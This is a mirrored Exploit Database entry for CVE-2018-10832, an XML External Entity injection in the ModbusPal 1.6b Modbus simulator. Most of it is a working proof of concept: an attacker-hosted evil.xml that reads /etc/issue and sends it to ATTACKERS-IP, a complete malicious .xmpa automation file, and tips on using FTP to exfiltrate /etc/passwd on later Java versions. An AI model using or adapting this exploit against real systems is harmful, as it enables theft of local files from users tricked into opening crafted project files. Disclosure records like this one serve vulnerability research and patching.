ModbusPal 1.6b – XML External Entity Injection

• Exploit Database
• 122 阅读

• 作者： Trent Gordon
  日期： 2018-05-10
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44607/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  [+] Exploit Title: ModbusPal XXE Injection [+] Date: 05-08-2018 [+] Exploit Author: Trent Gordon [+] Vendor Homepage: http://modbuspal.sourceforge.net/ [+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files [+] Version: 1.6b [+] Tested on: Ubuntu 16.04 with Java 1.8.0_151 [+] CVE: CVE-2018-10832   1. Vulnerability Description   ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack.Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection.Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.   2. Proof of Concept   a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)   b.) Contents of hosted "evil.xml"   <!ENTITY % data SYSTEM "file:///etc/issue"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM &apos;http://ATTACKERS-IP:9999/?%data;&apos;>">   c.) Example Exploited "xxe.xmpa"   <?xml version="1.0" ?>   <!DOCTYPE r [   <!ELEMENT r ANY >   <!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">   %sp;     %param1;     ]>   <r>&exfil;</r>   <!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">   <modbuspal_automation>   <automation name="temp" step="1.0" loop="true" init="0.0">   </automation>   </modbuspal_automation>   3. Additional Details   Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as &apos;/n&apos;) are included in a URL.This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters.The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria.Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.